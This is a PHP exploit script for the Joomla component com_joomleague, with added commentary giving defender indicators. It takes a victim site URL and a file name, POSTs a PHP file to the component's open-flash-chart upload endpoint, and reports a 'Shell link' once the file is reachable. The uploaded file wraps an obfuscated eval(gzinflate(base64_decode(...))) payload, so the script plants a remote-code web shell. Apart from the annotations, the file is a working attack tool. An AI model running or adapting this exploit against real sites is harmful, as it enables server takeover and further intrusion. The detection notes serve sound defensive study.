<?php
// Emit a static HTML banner naming the tool (a com_joomleague exploit) and its
// credited authors. The heredoc has no interpolated variables, so this output is
// constant and is produced on every request, before any parameter is checked.
echo <<<EOT
#  ----------------------------------------    <br />
#/   com_joomleague ~ Exploit                \ <br />
#\   Author: wantexz :: Edited: SilverWolf   / <br />
#  -----------------------------------------   <br />
EOT;

	// Inputs come from the query string of whoever requests this page:
	//   u = base URL of the targeted Joomla site
	//   f = name of the file to be created on that site
	// Both must be present; neither is validated, normalised or escaped before
	// being used to build URLs and being echoed into the HTML output further down.
	$url = '';
	$file = '';
	if(isset($_GET['u']) && isset($_GET['f']))
	{
		$url     =  $_GET['u'];
		$file    =  $_GET['f'];
	}
	else
	{
		// Usage text (Vietnamese, unaccented). English rendering:
		//   "Usage: http://mydomain.com/exp-joomleagure.php?u=http://victim.com/&f=up.php
		//    u = path to the Joomla home page (without index.php)
		//    f = name of the file that gets created on the victim server"
		// die() stops the script here, so no outbound request is made without both parameters.
		die("\n Cach su dung: http://mydomain.com/exp-joomleagure.php?u=http://victim.com/&f=up.php\n
			u=http://victim.com/    Duong dan toi trang chu Joomla (khong co index.php) \n
			f=up.php                Ten cua file duoc tao ta tren server victim.\n");

	}

	// Two URLs are derived from the caller-supplied base URL and file name:
	//   $shell   - where the uploaded file is expected to be reachable afterwards
	//              (components/com_joomleague/assets/classes/tmp-upload-images/<f>)
	//   $fullurl - the upload endpoint that is sent the POST
	//              (.../open-flash-chart/ofc_upload_image.php?name=<f>)
	// Presumably the endpoint stores the request body under tmp-upload-images/ using
	// the "name" parameter; that is inferred from these two paths, the endpoint's
	// code is not shown here.
	// Defender view: both paths are fixed strings, so requests for
	// ofc_upload_image.php with a "name" ending in .php, and script files appearing
	// under tmp-upload-images/, are direct indicators in access logs and file-integrity
	// checks. Removing or blocking the upload script and denying script execution in
	// the upload directory closes this path. Note the doubled slashes ("//components",
	// "classes//tmp-upload-images"), which appear literally in the requested URL.
	$shell = "{$url}//components/com_joomleague/assets/classes//tmp-upload-images/{$file}";
	$fullurl   = "{$url}//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name={$file}";

	// Content of the up.php file
	//http://starious.net/upload.txt
	// $data is the request body: a PHP snippet that runs
	// eval(gzinflate(base64_decode('...'))) on an embedded blob. The blob is not
	// decoded in this file, so what it does cannot be stated from here; the comment
	// above suggests it corresponds to upload.txt at the referenced URL (unverified).
	// Defender view: the eval + gzinflate + base64_decode nesting is a common
	// obfuscation wrapper and a practical signature for scanning web roots and
	// inspecting POST bodies.
	$data      = "<?php eval(gzinflate(base64_decode('XVHdSsMwFL7uYO+QhUIcuBavmwRBJojC1G1Xo5SsTUkwaUN3Ohziu5tkOtSrkPP9niRttZEHxNBtWt0/PC3XOxwnuCyS6STR7VUa7zvcCStxiWYMETL/8FiStqMxToDy8rR6Xb5sl+vNDocJLrO/uiIJdsHP9kdZjc70opFNFUg/EQSsqwKdlNcX7/k5K5G16hGm6oZTgdQgW0YuHMJXj4s7o+s3pOQgZzQXnOaeioug/Uxi+Od0Ek0IVWANp0qKhlPQYCTfxj4o9siyjObnsTeJpH3fnPh0Qtt+sMhKUH3DnlfrDZJdDScnGbajAe3EAHngLBoBAiNRg+47hnHQ6s6NgCIb5DugsCgL7f+B8f3xGf7+C/4bP4x7qwEdhRk9Yes8GjP9EWv6zmE9UnwB'))); ?>";

	// Header lines handed to curl. The first entry is a browser-style string with no
	// header name in front of it and with contradictory platform tokens
	// ("Windows NT 6.1" together with "Intel Mac OS X 10.6"); the second declares the
	// body as text/plain. Values this distinctive are usable as match conditions in
	// request logs or WAF rules.
	$headers = array('Mozilla/5.0 (Windows NT 6.1; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1','Content-Type: text/plain');


	// NOTE(review): $url is taken directly from $_GET['u'] and is echoed into the
	// page without HTML escaping.
	echo "        [+] Submitting request to: $url <br />";


	$handle = curl_init();

	// Passing a string to CURLOPT_POSTFIELDS makes this a POST whose body is $data;
	// CURLOPT_RETURNTRANSFER makes curl_exec() return the response body as a string
	// instead of printing it. No timeout, redirect or TLS options are set, so curl's
	// defaults apply. The destination host is whatever the requester put in "u", so
	// the server running this page issues the request on that person's behalf.
	curl_setopt($handle, CURLOPT_URL, $fullurl);
	curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
	curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
	curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

	// $source is the response body, or false if the transfer failed; the failure case
	// is not distinguished below.
	$source = curl_exec($handle);
	curl_close($handle);

	// Outcome check, two conditions:
	//  1. strpos() does not find 'Undefined variable: HTTP_RAW_POST_DATA' in the
	//     response at a non-zero offset (the result is negated directly, so "not
	//     found" and "found at offset 0" are treated alike).
	//  2. fopen() on the expected file URL succeeds. This needs allow_url_fopen and
	//     issues a second request, a GET for the file, right after the POST; '@'
	//     hides any warning and the returned handle is never closed.
	// Defender view: a POST to ofc_upload_image.php followed immediately by a GET for
	// the same file name under tmp-upload-images/ from one client is a recognisable
	// sequence in access logs. The marker string also suggests the endpoint reads
	// $HTTP_RAW_POST_DATA, which is presumably unset on hosts where the upload does
	// not work (verify against the endpoint's code).
	if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
	{
		echo "<h3><font color='blue'>[+] Exploit completed successfully!</font></h3> <br />";
		// NOTE(review): $shell contains caller-supplied text and is placed in an
		// unquoted href attribute without escaping (here and in the else branch).
		echo "<a href=$shell> Shell link </a>";
	}
	else
	{
		echo "<h3><font color='red'>[+] Exploit was unsuccessful. </font></h3> <br />";
		echo "<h3><font color='red'>[+] Try <a href=$shell>this link</a> for sure </font></h3> <br />";
	}
	// The raw response from the remote server is dumped into the page as-is.
	echo "RESPONSE DATA: <br />";
	var_dump($source);
	
	

?>